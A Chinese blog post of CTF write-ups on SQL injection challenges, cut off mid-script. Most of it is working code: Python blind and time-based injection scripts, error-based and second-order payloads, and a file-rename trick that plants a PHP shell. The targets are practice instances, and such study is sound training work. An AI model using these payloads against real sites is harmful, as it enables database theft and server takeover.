<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="Black Watch 入群题盲注，过滤了空格注释符，脚本123456789101112131415161718192021222324252627282930313233343536import requestsimport timei=1n=2flag=&quot;&quot;for i in range(10,18):    print(i)    m=64    j=64    for q in range(">
<meta property="og:type" content="article">
<meta property="og:title" content="今日份sql">
<meta property="og:url" content="http://yoursite.com/2020/02/15/今日份sql/index.html">
<meta property="og:site_name" content="cop&#39;s blog">
<meta property="og:description" content="Black Watch 入群题盲注，过滤了空格注释符，脚本123456789101112131415161718192021222324252627282930313233343536import requestsimport timei=1n=2flag=&quot;&quot;for i in range(10,18):    print(i)    m=64    j=64    for q in range(">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-02-16T14:24:56.774Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="今日份sql">
<meta name="twitter:description" content="Black Watch 入群题盲注，过滤了空格注释符，脚本123456789101112131415161718192021222324252627282930313233343536import requestsimport timei=1n=2flag=&quot;&quot;for i in range(10,18):    print(i)    m=64    j=64    for q in range(">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/02/15/今日份sql/">





  <title>今日份sql | cop's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">cop's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/15/今日份sql/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="cop">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="cop's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">今日份sql</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-02-15T16:45:27+08:00">
                2020-02-15
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Black-Watch-入群题"><a href="#Black-Watch-入群题" class="headerlink" title="Black Watch 入群题"></a>Black Watch 入群题</h2><p>盲注，过滤了空格注释符，脚本<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">i=1</span><br><span class="line">n=2</span><br><span class="line">flag=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(10,18):</span><br><span class="line">    <span class="built_in">print</span>(i)</span><br><span class="line">    m=64</span><br><span class="line">    j=64</span><br><span class="line">    <span class="keyword">for</span> q <span class="keyword">in</span> range(1,8):</span><br><span class="line">        <span class="keyword">if</span> q!=1:</span><br><span class="line">            j=j/2</span><br><span class="line">            <span class="keyword">if</span> n==1:</span><br><span class="line">                m=m+j</span><br><span class="line">            <span class="keyword">elif</span> n==0:</span><br><span class="line">                m=m-j</span><br><span class="line">        m=int(m)</span><br><span class="line">        <span class="comment">#payload="""1^(if((ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),&#123;&#125;,1))&gt;&#123;&#125;),1,0))^1""".format(i,m)</span></span><br><span class="line">        <span class="comment">#admin,contents</span></span><br><span class="line">        <span class="comment">#payload="""1^if((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),&#123;&#125;,1))&gt;&#123;&#125;),1,0)^1""".format(i,m)</span></span><br><span class="line">        <span class="comment">#id,username,password,is_enable</span></span><br><span class="line">        payload=<span class="string">""</span><span class="string">"1^if((ascii(substr((select(group_concat(username))from(admin)),&#123;&#125;,1))&gt;&#123;&#125;),1,0)^1"</span><span class="string">""</span>.format(i,m)</span><br><span class="line">        <span class="comment">#f80e656a,5676a826 073dc863,ca8490c4</span></span><br><span class="line">        url=<span class="string">"http://e9f8d063-241c-4f7c-aea6-3afac8c5a33f.node3.buuoj.cn/backend/content_detail.php?id=&#123;&#125;"</span>.format(payload)</span><br><span class="line">        time.sleep(0.15)</span><br><span class="line">        p=requests.get(url)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"title"</span>  <span class="keyword">in</span> p.text:</span><br><span class="line">            n=1</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            n=0</span><br><span class="line">        <span class="keyword">if</span> q==7:</span><br><span class="line">            <span class="keyword">if</span> <span class="string">"title"</span> <span class="keyword">in</span> p.text:</span><br><span class="line">                flag=flag+chr(m+1)</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                flag=flag+chr(m)</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure></p>
<h2 id="RCTF2015-EasySQL"><a href="#RCTF2015-EasySQL" class="headerlink" title="[RCTF2015]EasySQL"></a>[RCTF2015]EasySQL</h2><p>username 和email处存在过滤，登陆之后只有一个改密码功能，测试发现username处存在二次注入+报错注入<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">"||(updatexml(1,concat(0x3a,(select(version()))),1))%23</span></span><br><span class="line"><span class="string">1"</span>||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)<span class="built_in">where</span>(table_schema=database()))),1))%23</span><br><span class="line">article,flag,users</span><br><span class="line">1<span class="string">"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))%23</span></span><br><span class="line"><span class="string">name,pwd,enail,real_flag_1s_here</span></span><br><span class="line"><span class="string">1"</span>||(updatexml(1,concat(0x3a,(select(reverse(group_concat(real_flag_1s_here)))from(users)<span class="built_in">where</span>(real_flag_1s_here)regexp(<span class="string">'^f'</span>))),1))%23</span><br></pre></td></tr></table></figure></p>
<h2 id="网鼎杯2018-Unfinish"><a href="#网鼎杯2018-Unfinish" class="headerlink" title="[网鼎杯2018]Unfinish"></a>[网鼎杯2018]Unfinish</h2><p>打开给了一个login.php,扫到register.php，注册之后登陆，只显示了username，猜测注册页面的username参数存在注入<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">email=<span class="built_in">test</span>@666.com&amp;username=0<span class="string">'%2B(select hex(hex(database())))%2B'</span>0&amp;password=<span class="built_in">test</span></span><br></pre></td></tr></table></figure></p>
<p>如果一次hex之后字符中有字母，那么只会显示第一个字母之前的数，所以要两次hex，保证纯数字，这样才能显示出来<br>注册之后登陆，username就变成了注出来的数据，经过两次hex还原<br>字符串在两次hex后很长，会以科学计数法的形式插入，所以要每次截取10个字符<br>过滤了逗号，用substr(‘test’ from 1 for 10)的形式绕过<br>因为过滤了information所以只能盲猜表名flag<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0<span class="string">'%2B(select substr(hex(hex((select * from flag))) from 1 for 10))%2B'</span>0</span><br></pre></td></tr></table></figure></p>
<p>从<a href="https://www.ckj123.com/?p=45" target="_blank" rel="noopener">这位师傅这里嫖来的脚本</a><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import string</span><br><span class="line">import re as r</span><br><span class="line"> </span><br><span class="line">ch = string.ascii_lowercase+string.digits+<span class="string">'-&#125;'</span>+<span class="string">'&#123;'</span></span><br><span class="line"> </span><br><span class="line">re = requests.session()</span><br><span class="line">url = <span class="string">'http://5bdb2d21-73f8-4fc9-8d35-239911ef58c3.node3.buuoj.cn/'</span></span><br><span class="line"> </span><br><span class="line">def register(email,username):</span><br><span class="line">    url1 = url+<span class="string">'register.php'</span> </span><br><span class="line">    data = dict(email = email, username = username,password = <span class="string">'adsl1234'</span>)</span><br><span class="line">    html = re.post(url1,data=data)</span><br><span class="line">    html.encoding = <span class="string">'utf-8'</span></span><br><span class="line">    <span class="built_in">return</span> html</span><br><span class="line"> </span><br><span class="line">def login(email):</span><br><span class="line">    url2 = url+<span class="string">'login.php'</span></span><br><span class="line">    data = dict(email = email,password = <span class="string">'adsl1234'</span>)</span><br><span class="line">    html = re.post(url2, data=data)</span><br><span class="line">    html.encoding = <span class="string">'utf-8'</span></span><br><span class="line">    <span class="built_in">return</span> html</span><br><span class="line"></span><br><span class="line">f = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(0,17):</span><br><span class="line">    payload = <span class="string">"0'^(select substr(hex(hex((select * from flag))) from &#123;&#125; for &#123;&#125;))^'0"</span>.format(int(j)*10+1,10)</span><br><span class="line">    email = <span class="string">'&#123;&#125;@qq.com'</span>.format(str(j)+<span class="string">'14'</span>)</span><br><span class="line">    html = register(email,payload)</span><br><span class="line">    <span class="comment"># print html.text</span></span><br><span class="line">    html = login(email)</span><br><span class="line">    try:</span><br><span class="line">        res = r.findall(r<span class="string">'&lt;span class="user-name"&gt;(.*?)&lt;/span&gt;'</span>,html.text,r.S)</span><br><span class="line">        flag = res[0][1:].strip()</span><br><span class="line">        <span class="built_in">print</span> flag</span><br><span class="line">        f += flag</span><br><span class="line">        <span class="built_in">print</span> f</span><br><span class="line">        <span class="built_in">print</span> f.decode(<span class="string">'hex'</span>).decode(<span class="string">'hex'</span>)</span><br><span class="line">    except:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">"problem"</span></span><br></pre></td></tr></table></figure></p>
<p>用’ or (case when 1=1 then ‘a’ else ‘b’ end)=’a  测试是存在注入的，可以基于时间也可以基于布尔<br>改变自<a href="https://www.smi1e.top/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%BA%8C%E5%9C%BAwrite-up/" target="_blank" rel="noopener">smile师傅的脚本</a><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">i=1</span><br><span class="line">n=2</span><br><span class="line">flag=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(10,18):</span><br><span class="line">    <span class="built_in">print</span>(i)</span><br><span class="line">    m=64</span><br><span class="line">    j=64</span><br><span class="line">    <span class="keyword">for</span> q <span class="keyword">in</span> range(1,8):</span><br><span class="line">        <span class="keyword">if</span> q!=1:</span><br><span class="line">            j=j/2</span><br><span class="line">            <span class="keyword">if</span> n==1:</span><br><span class="line">                m=m+j</span><br><span class="line">            <span class="keyword">elif</span> n==0:</span><br><span class="line">                m=m-j</span><br><span class="line">        m=int(m)</span><br><span class="line">        payload=<span class="string">"' or (case when ascii(mid((select * from flag limit 1 offset 0)from(&#123;&#125;)for(1)))&gt;&#123;&#125; then sleep(3) else 'b' end)='a"</span>.format(i,m)</span><br><span class="line">        url = <span class="string">'http://5bdb2d21-73f8-4fc9-8d35-239911ef58c3.node3.buuoj.cn/'</span></span><br><span class="line">        data=&#123;<span class="string">"email"</span>:<span class="string">"11@qq.com"</span>,</span><br><span class="line">            <span class="string">"username"</span>:payload,</span><br><span class="line">            <span class="string">"password"</span>:<span class="string">"11"</span>&#125;</span><br><span class="line">        <span class="comment">#time.sleep(0.15)</span></span><br><span class="line">        startTime=time.time()</span><br><span class="line">        p=requests.post(url,data=data,timeout=100)</span><br><span class="line">        <span class="keyword">if</span> time.time()-startTime&gt;2:</span><br><span class="line">            n=1</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            n=0</span><br><span class="line">        <span class="keyword">if</span> q==7:</span><br><span class="line">            <span class="keyword">if</span> time.time()-startTime&gt;2:</span><br><span class="line">                flag=flag+chr(m+1)</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                flag=flag+chr(m)</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure></p>
<h2 id="XDCTF-2015-filemanager"><a href="#XDCTF-2015-filemanager" class="headerlink" title="[XDCTF 2015]filemanager"></a>[XDCTF 2015]filemanager</h2><p><a href="http://www.tar.gz泄露源码，对每个参数都都有addslashes过滤" target="_blank" rel="noopener">www.tar.gz泄露源码，对每个参数都都有addslashes过滤</a><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">foreach (array(<span class="variable">$_GET</span>, <span class="variable">$_POST</span>, <span class="variable">$_COOKIE</span>) as <span class="variable">$global_var</span>) &#123;</span><br><span class="line">	foreach (<span class="variable">$global_var</span> as <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">		is_string(<span class="variable">$value</span>) &amp;&amp; <span class="variable">$req</span>[<span class="variable">$key</span>] = addslashes(<span class="variable">$value</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>猜测存在二次注入，在rename.php里<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$re</span> = <span class="variable">$db</span>-&gt;query(<span class="string">"update `file` set `filename`='&#123;<span class="variable">$req</span>['newname']&#125;', `oldname`='&#123;<span class="variable">$result</span>['filename']&#125;' where `fid`=&#123;<span class="variable">$result</span>['fid']&#125;"</span>);</span><br></pre></td></tr></table></figure></p>
<p>这里使用了sql查询出来的数据filename和fid，到upload.php找到有关filename的代码<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$name</span> = basename(<span class="variable">$file</span>[<span class="string">"name"</span>]);</span><br><span class="line"><span class="variable">$path_parts</span> = pathinfo(<span class="variable">$name</span>);</span><br><span class="line"><span class="variable">$path_parts</span>[<span class="string">'filename'</span>] = addslashes(<span class="variable">$path_parts</span>[<span class="string">'filename'</span>]);</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">"insert into `file` ( `filename`, `view`, `extension`) values( '&#123;<span class="variable">$path_parts</span>['filename']&#125;', 0, '&#123;<span class="variable">$path_parts</span>['extension']&#125;')"</span>;</span><br></pre></td></tr></table></figure></p>
<p>filename是文件名，是可控的，很明显注入点在filename，因为输出了报错信息，所以报错注入比较方便<br>但是注出来的数据库数据没有flag233，看了wp才知道要修改上传文件后缀getshell<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$oldname</span> = UPLOAD_DIR . <span class="variable">$result</span>[<span class="string">"filename"</span>] . <span class="variable">$result</span>[<span class="string">"extension"</span>];</span><br><span class="line"><span class="variable">$newname</span> = UPLOAD_DIR . <span class="variable">$req</span>[<span class="string">"newname"</span>] . <span class="variable">$result</span>[<span class="string">"extension"</span>];</span><br><span class="line"><span class="keyword">if</span> (file_exists(<span class="variable">$oldname</span>)) &#123;</span><br><span class="line">			rename(<span class="variable">$oldname</span>, <span class="variable">$newname</span>);</span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure></p>
<p>因为新文件后缀是上次sql查询出来的，所以要先把后缀置空<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">文件名</span><br><span class="line">cop<span class="string">',`extension`='</span><span class="string">'#.jpg</span></span><br><span class="line"><span class="string">rename</span></span><br><span class="line"><span class="string">oldname=cop.jpg'</span>,`extension`=<span class="string">''</span><span class="comment">#&amp;newname=cop.jpg</span></span><br></pre></td></tr></table></figure></p>
<p>现在filename=cop.jpg,文件名是cop.jpg.jpg，要再上传一个cop.jpg内容为shell<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">oldname=cop.jpg&amp;newname=cop.php</span><br></pre></td></tr></table></figure></p>
<p>flag在根目录</p>
<h2 id="facebook-ctf-2019-product-manager"><a href="#facebook-ctf-2019-product-manager" class="headerlink" title="facebook ctf 2019 product manager"></a>facebook ctf 2019 product manager</h2><p><a href="https://www.freebuf.com/articles/web/124537.html" target="_blank" rel="noopener">基于约束的SQL攻击</a><br>name char(64),数据库中有一个admin用户<br>注册一个admin+64空格+1,在select * FROM users where name=’admin+64空格+1’中查询结果是空<br>但是在insert中会去掉后面多余的字符注册一个admin+59个空格的用户，这个用户等同于admin用户<br>这是因为，SQL会在内部使用空格来填充字符串，以便在比较之前使其它们的长度保持一致<br>防御方法是name列加上UNIQUE约束</p>
<h2 id="网鼎杯-2018-Comment"><a href="#网鼎杯-2018-Comment" class="headerlink" title="[网鼎杯 2018]Comment"></a>[网鼎杯 2018]Comment</h2><p>git恢复源码，我恢复出来的源码不全233，从<a href="http://www.ch4ser.top/2019/04/22/SQL%E9%A2%98%E5%9E%8B%E8%AE%B0%E5%BD%95/" target="_blank" rel="noopener">旺哥</a>这里复制的<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include <span class="string">"mysql.php"</span>;</span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">'login'</span>] != <span class="string">'yes'</span>)&#123;</span><br><span class="line">    header(<span class="string">"Location: ./login.php"</span>);</span><br><span class="line">    die();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(isset(<span class="variable">$_GET</span>[<span class="string">'do'</span>]))&#123;</span><br><span class="line">switch (<span class="variable">$_GET</span>[<span class="string">'do'</span>])</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'write'</span>:</span><br><span class="line">    <span class="variable">$category</span> = addslashes(<span class="variable">$_POST</span>[<span class="string">'category'</span>]);</span><br><span class="line">    <span class="variable">$title</span> = addslashes(<span class="variable">$_POST</span>[<span class="string">'title'</span>]);</span><br><span class="line">    <span class="variable">$content</span> = addslashes(<span class="variable">$_POST</span>[<span class="string">'content'</span>]);</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">"insert into board</span></span><br><span class="line"><span class="string">            set category = '<span class="variable">$category</span>',</span></span><br><span class="line"><span class="string">                title = '<span class="variable">$title</span>',</span></span><br><span class="line"><span class="string">                content = '<span class="variable">$content</span>'"</span>;</span><br><span class="line">    <span class="variable">$result</span> = mysql_query(<span class="variable">$sql</span>);</span><br><span class="line">    header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">    <span class="built_in">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="string">'comment'</span>:</span><br><span class="line">    <span class="variable">$bo_id</span> = addslashes(<span class="variable">$_POST</span>[<span class="string">'bo_id'</span>]);</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">"select category from board where id='<span class="variable">$bo_id</span>'"</span>;</span><br><span class="line">    <span class="variable">$result</span> = mysql_query(<span class="variable">$sql</span>);</span><br><span class="line">    <span class="variable">$num</span> = mysql_num_rows(<span class="variable">$result</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>&gt;0)&#123;</span><br><span class="line">    <span class="variable">$category</span> = mysql_fetch_array(<span class="variable">$result</span>)[<span class="string">'category'</span>];</span><br><span class="line">    <span class="variable">$content</span> = addslashes(<span class="variable">$_POST</span>[<span class="string">'content'</span>]);</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">"insert into comment</span></span><br><span class="line"><span class="string">            set category = '<span class="variable">$category</span>',</span></span><br><span class="line"><span class="string">                content = '<span class="variable">$content</span>',</span></span><br><span class="line"><span class="string">                bo_id = '<span class="variable">$bo_id</span>'"</span>;</span><br><span class="line">    <span class="variable">$result</span> = mysql_query(<span class="variable">$sql</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    header(<span class="string">"Location: ./comment.php?id=<span class="variable">$bo_id</span>"</span>);        </span><br><span class="line">    <span class="built_in">break</span>;</span><br><span class="line">default:</span><br><span class="line">    header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    header(<span class="string">"Location: ./index.php"</span>);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>很明显category存在二次注入<br>提交一个帖子之后转到登陆，已经给了账号zhangwei 秘密zhangwei***，爆破后三位是666<br>多行的sql结合php注释避免破坏结构,附旺哥的脚本，旺哥tql<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import random</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://10a319be-9667-4c10-94ca-bdc272ca247f.node3.buuoj.cn"</span></span><br><span class="line"></span><br><span class="line">s = requests.session()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def ran_str():</span><br><span class="line">    string = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(6):</span><br><span class="line">        string += chr(random.randint(ord(<span class="string">'A'</span>), ord(<span class="string">'Z'</span>)))</span><br><span class="line"></span><br><span class="line">    <span class="built_in">return</span> string</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def login():</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">"username"</span>: <span class="string">"zhangwei"</span>,</span><br><span class="line">        <span class="string">"password"</span>: 